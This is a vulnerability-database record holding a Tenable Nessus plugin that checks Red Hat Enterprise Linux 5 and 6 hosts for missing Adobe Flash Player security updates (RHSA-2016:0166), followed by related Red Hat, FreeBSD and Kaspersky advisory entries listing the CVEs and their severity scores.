{"id": "REDHAT-RHSA-2016-0166.NASL", "bulletinFamily": "scanner", "title": "RHEL 5 / 6 : flash-plugin (RHSA-2016:0166)", "description": "An updated Adobe Flash Player package that fixes multiple security\nissues is now available for Red Hat Enterprise Linux 5 and 6\nSupplementary.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nThe flash-plugin package contains a Mozilla Firefox compatible Adobe\nFlash Player web browser plug-in.\n\nThis update fixes multiple vulnerabilities in Adobe Flash Player.\nThese vulnerabilities, detailed in the Adobe Security Bulletin\nAPSB16-04 listed in the References section, could allow an attacker to\ncreate a specially crafted SWF file that would cause flash-plugin to\ncrash, execute arbitrary code, or disclose sensitive information when\nthe victim loaded a page containing the malicious SWF content.\n(CVE-2016-0964, CVE-2016-0965, CVE-2016-0966, CVE-2016-0967,\nCVE-2016-0968, CVE-2016-0969, CVE-2016-0970, CVE-2016-0971,\nCVE-2016-0972, CVE-2016-0973, CVE-2016-0974, CVE-2016-0975,\nCVE-2016-0976, CVE-2016-0977, CVE-2016-0978, CVE-2016-0979,\nCVE-2016-0980, CVE-2016-0981, CVE-2016-0982, CVE-2016-0983,\nCVE-2016-0984, CVE-2016-0985)\n\nAll users of Adobe Flash Player should install this updated package,\nwhich upgrades Flash Player to version 11.2.202.569.", "published": "2016-02-11T00:00:00", "modified": "2021-02-02T00:00:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://www.tenable.com/plugins/nessus/88690", "reporter": "This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://access.redhat.com/security/cve/cve-2016-0978", "https://access.redhat.com/security/cve/cve-2016-0979", "https://access.redhat.com/errata/RHSA-2016:0166", "https://access.redhat.com/security/cve/cve-2016-0966", "https://access.redhat.com/security/cve/cve-2016-0981", "https://access.redhat.com/security/cve/cve-2016-0983", "https://access.redhat.com/security/cve/cve-2016-0973", "https://access.redhat.com/security/cve/cve-2016-0964", "https://access.redhat.com/security/cve/cve-2016-0972", "https://access.redhat.com/security/cve/cve-2016-0980", "https://access.redhat.com/security/cve/cve-2016-0967", "https://access.redhat.com/security/cve/cve-2016-0976", "https://access.redhat.com/security/cve/cve-2016-0977", "https://access.redhat.com/security/cve/cve-2016-0985", "https://access.redhat.com/security/cve/cve-2016-0969", "https://access.redhat.com/security/cve/cve-2016-0968", "https://access.redhat.com/security/cve/cve-2016-0974", "https://access.redhat.com/security/cve/cve-2016-0971", "https://access.redhat.com/security/cve/cve-2016-0982", "https://access.redhat.com/security/cve/cve-2016-0984", "https://helpx.adobe.com/security/products/flash-player/apsb16-04.html", "https://access.redhat.com/security/cve/cve-2016-0970", "https://access.redhat.com/security/cve/cve-2016-0975", "https://access.redhat.com/security/cve/cve-2016-0965"], "cvelist": ["CVE-2016-0982", "CVE-2016-0984", "CVE-2016-0979", "CVE-2016-0967", "CVE-2016-0970", "CVE-2016-0972", "CVE-2016-0969", "CVE-2016-0980", "CVE-2016-0974", "CVE-2016-0973", "CVE-2016-0966", "CVE-2016-0971", "CVE-2016-0978", "CVE-2016-0965", "CVE-2016-0975", "CVE-2016-0983", "CVE-2016-0964", "CVE-2016-0968", "CVE-2016-0976", "CVE-2016-0981", "CVE-2016-0977", "CVE-2016-0985"], "type": "nessus", "lastseen": "2021-02-01T05:32:53", "edition": 30, "viewCount": 5, "enchantments": {"dependencies": {"references": [{"type": "redhat", "idList": ["RHSA-2016:0166"]}, {"type": "freebsd", "idList": ["5D8E56C3-9E67-4D5B-81C9-3A409DFD705F"]}, {"type": "kaspersky", "idList": ["KLA10756", "KLA10758"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310806865", "OPENVAS:1361412562310851202", "OPENVAS:1361412562310131217", "OPENVAS:1361412562310810661", "OPENVAS:1361412562310810659", "OPENVAS:1361412562310806867", "OPENVAS:1361412562310806866", "OPENVAS:13614125623108066845", "OPENVAS:1361412562310806684", "OPENVAS:1361412562310810660"]}, {"type": "nessus", "idList": ["MACOSX_FLASH_PLAYER_APSB16-04.NASL", "FREEBSD_PKG_5D8E56C39E674D5B81C93A409DFD705F.NASL", "OPENSUSE-2016-183.NASL", "SMB_NT_MS16-022.NASL", "ADOBE_AIR_APSB16-04.NASL", "FLASH_PLAYER_APSB16-04.NASL", "GENTOO_GLSA-201603-07.NASL", "MACOSX_ADOBE_AIR_APSB16-04.NASL", "OPENSUSE-2016-186.NASL"]}, {"type": "suse", "idList": ["SUSE-SU-2016:0400-1", "OPENSUSE-SU-2016:0412-1", "SUSE-SU-2016:0398-1", "OPENSUSE-SU-2016:0415-1"]}, {"type": "attackerkb", "idList": ["AKB:EE2653E1-CBE1-4AF3-A198-B66C88A65136"]}, {"type": "gentoo", "idList": ["GLSA-201603-07"]}, {"type": "cve", "idList": ["CVE-2016-0969", "CVE-2016-0964", "CVE-2016-0976", "CVE-2016-0975", "CVE-2016-0974", "CVE-2016-0970", "CVE-2016-0971", "CVE-2016-0972", "CVE-2016-0968", "CVE-2016-0979"]}, {"type": "zdt", "idList": ["1337DAY-ID-25834", "1337DAY-ID-25835", "1337DAY-ID-25833", "1337DAY-ID-25829", "1337DAY-ID-25830", "1337DAY-ID-25836", "1337DAY-ID-25831"]}, {"type": "exploitdb", "idList": ["EDB-ID:39462", "EDB-ID:39460", "EDB-ID:39467", "EDB-ID:39465", "EDB-ID:39466", "EDB-ID:39463", "EDB-ID:39461"]}, {"type": "zdi", "idList": ["ZDI-16-161", "ZDI-16-160"]}, {"type": "hackerone", "idList": ["H1:119653", "H1:119652", "H1:119655"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:3CC5C12B80F69A02CA55F9CCF64DF766"]}, {"type": "securelist", "idList": ["SECURELIST:56D279C45B0C4431FBA76FDF2EC365A1", "SECURELIST:75F0B75D28318C525992E42495D8C5EE"]}, {"type": "threatpost", "idList": ["THREATPOST:BAC3CD99B74F1D6CD22A123ED632AA3F"]}], "modified": "2021-02-01T05:32:53", "rev": 2}, "score": {"value": 10.5, "vector": "NONE", "modified": "2021-02-01T05:32:53", "rev": 2}, "vulnersScore": 10.5}, "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2016:0166. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(88690);\n script_version(\"2.22\");\n script_cvs_date(\"Date: 2019/10/24 15:35:41\");\n\n script_cve_id(\"CVE-2016-0964\", \"CVE-2016-0965\", \"CVE-2016-0966\", \"CVE-2016-0967\", \"CVE-2016-0968\", \"CVE-2016-0969\", \"CVE-2016-0970\", \"CVE-2016-0971\", \"CVE-2016-0972\", \"CVE-2016-0973\", \"CVE-2016-0974\", \"CVE-2016-0975\", \"CVE-2016-0976\", \"CVE-2016-0977\", \"CVE-2016-0978\", \"CVE-2016-0979\", \"CVE-2016-0980\", \"CVE-2016-0981\", \"CVE-2016-0982\", \"CVE-2016-0983\", \"CVE-2016-0984\", \"CVE-2016-0985\");\n script_xref(name:\"RHSA\", value:\"2016:0166\");\n\n script_name(english:\"RHEL 5 / 6 : flash-plugin (RHSA-2016:0166)\");\n script_summary(english:\"Checks the rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An updated Adobe Flash Player package that fixes multiple security\nissues is now available for Red Hat Enterprise Linux 5 and 6\nSupplementary.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nThe flash-plugin package contains a Mozilla Firefox compatible Adobe\nFlash Player web browser plug-in.\n\nThis update fixes multiple vulnerabilities in Adobe Flash Player.\nThese vulnerabilities, detailed in the Adobe Security Bulletin\nAPSB16-04 listed in the References section, could allow an attacker to\ncreate a specially crafted SWF file that would cause flash-plugin to\ncrash, execute arbitrary code, or disclose sensitive information when\nthe victim loaded a page containing the malicious SWF content.\n(CVE-2016-0964, CVE-2016-0965, CVE-2016-0966, CVE-2016-0967,\nCVE-2016-0968, CVE-2016-0969, CVE-2016-0970, CVE-2016-0971,\nCVE-2016-0972, CVE-2016-0973, CVE-2016-0974, CVE-2016-0975,\nCVE-2016-0976, CVE-2016-0977, CVE-2016-0978, CVE-2016-0979,\nCVE-2016-0980, CVE-2016-0981, CVE-2016-0982, CVE-2016-0983,\nCVE-2016-0984, CVE-2016-0985)\n\nAll users of Adobe Flash Player should install this updated package,\nwhich upgrades Flash Player to version 11.2.202.569.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://helpx.adobe.com/security/products/flash-player/apsb16-04.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2016:0166\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-0978\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-0979\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-0976\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-0977\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-0974\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-0975\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-0972\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-0973\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-0970\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-0971\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-0985\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-0984\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-0983\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-0982\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-0981\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-0980\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-0969\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-0968\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-0965\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-0964\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-0967\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-0966\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected flash-plugin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:flash-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/02/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/02/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/02/11\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(5|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x / 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2016:0166\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", reference:\"flash-plugin-11.2.202.569-1.el5\")) flag++;\n\n\n if (rpm_check(release:\"RHEL6\", reference:\"flash-plugin-11.2.202.569-1.el6_7\")) flag++;\n\n\n if (flag)\n {\n flash_plugin_caveat = '\\n' +\n 'NOTE: This vulnerability check only applies to RedHat released\\n' +\n 'versions of the flash-plugin package. This check does not apply to\\n' +\n 'Adobe released versions of the flash-plugin package, which are\\n' +\n 'versioned similarly and cause collisions in detection.\\n\\n' +\n\n 'If you are certain you are running the Adobe released package of\\n' +\n 'flash-plugin and are running a version of it equal or higher to the\\n' +\n 'RedHat version listed above then you can consider this a false\\n' +\n 'positive.\\n';\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat() + flash_plugin_caveat\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-plugin\");\n }\n}\n", "naslFamily": "Red Hat Local Security Checks", "pluginID": "88690", "cpe": ["cpe:/o:redhat:enterprise_linux:6.7", "cpe:/o:redhat:enterprise_linux:5", "p-cpe:/a:redhat:enterprise_linux:flash-plugin", "cpe:/o:redhat:enterprise_linux:6"], "scheme": null, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}}

{"redhat": [{"lastseen": "2019-08-13T18:46:32", "bulletinFamily": "unix", "cvelist": ["CVE-2016-0964", "CVE-2016-0965", "CVE-2016-0966", "CVE-2016-0967", "CVE-2016-0968", "CVE-2016-0969", "CVE-2016-0970", "CVE-2016-0971", "CVE-2016-0972", "CVE-2016-0973", "CVE-2016-0974", "CVE-2016-0975", "CVE-2016-0976", "CVE-2016-0977", "CVE-2016-0978", "CVE-2016-0979", "CVE-2016-0980", "CVE-2016-0981", "CVE-2016-0982", "CVE-2016-0983", "CVE-2016-0984", "CVE-2016-0985"], "description": "The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash\nPlayer web browser plug-in.\n\nThis update fixes multiple vulnerabilities in Adobe Flash Player. These\nvulnerabilities, detailed in the Adobe Security Bulletin APSB16-04 listed\nin the References section, could allow an attacker to create a specially\ncrafted SWF file that would cause flash-plugin to crash, execute arbitrary\ncode, or disclose sensitive information when the victim loaded a page\ncontaining the malicious SWF content. (CVE-2016-0964, CVE-2016-0965,\nCVE-2016-0966, CVE-2016-0967, CVE-2016-0968, CVE-2016-0969, CVE-2016-0970,\nCVE-2016-0971, CVE-2016-0972, CVE-2016-0973, CVE-2016-0974, CVE-2016-0975,\nCVE-2016-0976, CVE-2016-0977, CVE-2016-0978, CVE-2016-0979, CVE-2016-0980,\nCVE-2016-0981, CVE-2016-0982, CVE-2016-0983, CVE-2016-0984, CVE-2016-0985)\n\nAll users of Adobe Flash Player should install this updated package, which\nupgrades Flash Player to version 11.2.202.569.\n", "modified": "2018-06-07T09:04:37", "published": "2016-02-10T05:00:00", "id": "RHSA-2016:0166", "href": "https://access.redhat.com/errata/RHSA-2016:0166", "type": "redhat", "title": "(RHSA-2016:0166) Critical: flash-plugin security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "freebsd": [{"lastseen": "2019-05-29T18:32:49", "bulletinFamily": "unix", "cvelist": ["CVE-2016-0982", "CVE-2016-0984", "CVE-2016-0979", "CVE-2016-0967", "CVE-2016-0970", "CVE-2016-0972", "CVE-2016-0969", "CVE-2016-0980", "CVE-2016-0974", "CVE-2016-0973", "CVE-2016-0966", "CVE-2016-0971", "CVE-2016-0978", "CVE-2016-0965", "CVE-2016-0975", "CVE-2016-0983", "CVE-2016-0964", "CVE-2016-0968", "CVE-2016-0976", "CVE-2016-0981", "CVE-2016-0977", "CVE-2016-0985"], "description": "\nAdobe reports:\n\nThese updates resolve a type confusion vulnerability that\n\t could lead to code execution (CVE-2016-0985).\nThese updates resolve use-after-free vulnerabilities that\n\t could lead to code execution (CVE-2016-0973, CVE-2016-0974,\n\t CVE-2016-0975, CVE-2016-0982, CVE-2016-0983, CVE-2016-0984).\nThese updates resolve a heap buffer overflow vulnerability\n\t that could lead to code execution (CVE-2016-0971).\nThese updates resolve memory corruption vulnerabilities\n\t that could lead to code execution (CVE-2016-0964,\n\t CVE-2016-0965, CVE-2016-0966, CVE-2016-0967, CVE-2016-0968,\n\t CVE-2016-0969, CVE-2016-0970, CVE-2016-0972, CVE-2016-0976,\n\t CVE-2016-0977, CVE-2016-0978, CVE-2016-0979, CVE-2016-0980,\n\t CVE-2016-0981).\n\n", "edition": 4, "modified": "2016-02-09T00:00:00", "published": "2016-02-09T00:00:00", "id": "5D8E56C3-9E67-4D5B-81C9-3A409DFD705F", "href": "https://vuxml.freebsd.org/freebsd/5d8e56c3-9e67-4d5b-81c9-3a409dfd705f.html", "title": "flash -- multiple vulnerabilities", "type": "freebsd", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "kaspersky": [{"lastseen": "2020-09-02T12:00:37", "bulletinFamily": "info", "cvelist": ["CVE-2016-0982", "CVE-2016-0984", "CVE-2016-0979", "CVE-2016-0967", "CVE-2016-0970", "CVE-2016-0972", "CVE-2016-0969", "CVE-2016-0980", "CVE-2016-0974", "CVE-2016-0973", "CVE-2016-0966", "CVE-2016-0971", "CVE-2016-0978", "CVE-2016-0965", "CVE-2016-0975", "CVE-2016-0983", "CVE-2016-0964", "CVE-2016-0968", "CVE-2016-0976", "CVE-2016-0981", "CVE-2016-0977", "CVE-2016-0985"], "description": "### *Detect date*:\n02/09/2016\n\n### *Severity*:\nHigh\n\n### *Description*:\nMicrosoft released update to address vulnerabilities in Flash Player for Internet explorer. For details look at KLA10757.\n\n### *Affected products*:\nWindows 8 for 32-bit Systems \nWindows 8 for 64-bit Systems \nWindows Server 2012 \nWindows RT \nWindows 8.1 for 32-bit Systems \nWindows 8.1 for 64-bit Systems \nWindows Server 2012 R2 \nWindows RT 8.1 \nWindows 10 for 32-bit Systems \nWindows 10 for 64-bit Systems\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2016-0985](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-0985>) \n[CVE-2016-0983](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-0983>) \n[CVE-2016-0984](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-0984>) \n[CVE-2016-0981](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-0981>) \n[CVE-2016-0982](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-0982>) \n[CVE-2016-0964](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-0964>) \n[CVE-2016-0965](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-0965>) \n[CVE-2016-0966](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-0966>) \n[CVE-2016-0967](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-0967>) \n[CVE-2016-0968](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-0968>) \n[CVE-2016-0969](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-0969>) \n[CVE-2016-0970](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-0970>) \n[CVE-2016-0972](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-0972>) \n[CVE-2016-0971](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-0971>) \n[CVE-2016-0976](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-0976>) \n[CVE-2016-0975](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-0975>) \n[CVE-2016-0974](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-0974>) \n[CVE-2016-0973](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-0973>) \n[CVE-2016-0980](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-0980>) \n[CVE-2016-0979](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-0979>) \n[CVE-2016-0978](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-0978>) \n[CVE-2016-0977](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-0977>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *CVE-IDS*:\n[CVE-2016-0985](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0985>)9.3Critical \n[CVE-2016-0983](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0983>)10.0Critical \n[CVE-2016-0984](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0984>)10.0Critical \n[CVE-2016-0981](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0981>)10.0Critical \n[CVE-2016-0982](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0982>)10.0Critical \n[CVE-2016-0964](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0964>)10.0Critical \n[CVE-2016-0965](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0965>)10.0Critical \n[CVE-2016-0966](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0966>)10.0Critical \n[CVE-2016-0967](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0967>)10.0Critical \n[CVE-2016-0968](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0968>)10.0Critical \n[CVE-2016-0969](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0969>)10.0Critical \n[CVE-2016-0970](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0970>)10.0Critical \n[CVE-2016-0972](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0972>)10.0Critical \n[CVE-2016-0971](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0971>)10.0Critical \n[CVE-2016-0976](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0976>)10.0Critical \n[CVE-2016-0975](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0975>)9.3Critical \n[CVE-2016-0974](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0974>)10.0Critical \n[CVE-2016-0973](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0973>)9.3Critical \n[CVE-2016-0980](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0980>)10.0Critical \n[CVE-2016-0979](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0979>)10.0Critical \n[CVE-2016-0978](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0978>)10.0Critical \n[CVE-2016-0977](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0977>)10.0Critical\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[3135782](<http://support.microsoft.com/kb/3135782>)\n\n### *Exploitation*:\nThe following public exploits exists for this vulnerability:", "edition": 41, "modified": "2020-06-18T00:00:00", "published": "2016-02-09T00:00:00", "id": "KLA10758", "href": "https://threats.kaspersky.com/en/vulnerability/KLA10758", "title": "\r KLA10758Obsolete Adobe Flash Player for Windows ", "type": "kaspersky", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-02T11:53:04", "bulletinFamily": "info", "cvelist": ["CVE-2016-0982", "CVE-2016-0984", "CVE-2016-0979", "CVE-2016-0967", "CVE-2016-0970", "CVE-2016-0972", "CVE-2016-0969", "CVE-2016-0980", "CVE-2016-0974", "CVE-2016-0973", "CVE-2016-0966", "CVE-2016-0971", "CVE-2016-0978", "CVE-2016-0965", "CVE-2016-0975", "CVE-2016-0983", "CVE-2016-0964", "CVE-2016-0968", "CVE-2016-0976", "CVE-2016-0981", "CVE-2016-0977", "CVE-2016-0985"], "description": "### *Detect date*:\n02/09/2016\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple serious vulnerabilities have been found in Adobe Flash Player &amp; AIR. Malicious users can exploit these vulnerabilities to execute arbitrary code.\n\n### *Affected products*:\nAdobe Flash Player versions earlier than 20.0.0.306 \nAdobe Flash Player Extended Support Release versions earlier than 18.0.0.329 \nAdobe Flash Player for Linux versions earlier than 11.2.202.569 \nAdobe AIR versions earlier than 20.0.0.260\n\n### *Solution*:\nUpdate to the latest version \n[Get Flash Player](<https://get.adobe.com/flashplayer/>) \n[Get AIR](<https://get.adobe.com/air/>)\n\n### *Original advisories*:\n[Adobe security bulletin](<https://helpx.adobe.com/security/products/flash-player/apsb16-04.html>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Adobe Flash Player ActiveX](<https://threats.kaspersky.com/en/product/Adobe-Flash-Player-ActiveX/>)\n\n### *CVE-IDS*:\n[CVE-2016-0985](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0985>)9.3Critical \n[CVE-2016-0983](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0983>)10.0Critical \n[CVE-2016-0984](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0984>)10.0Critical \n[CVE-2016-0981](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0981>)10.0Critical \n[CVE-2016-0982](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0982>)10.0Critical \n[CVE-2016-0964](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0964>)10.0Critical \n[CVE-2016-0965](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0965>)10.0Critical \n[CVE-2016-0966](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0966>)10.0Critical 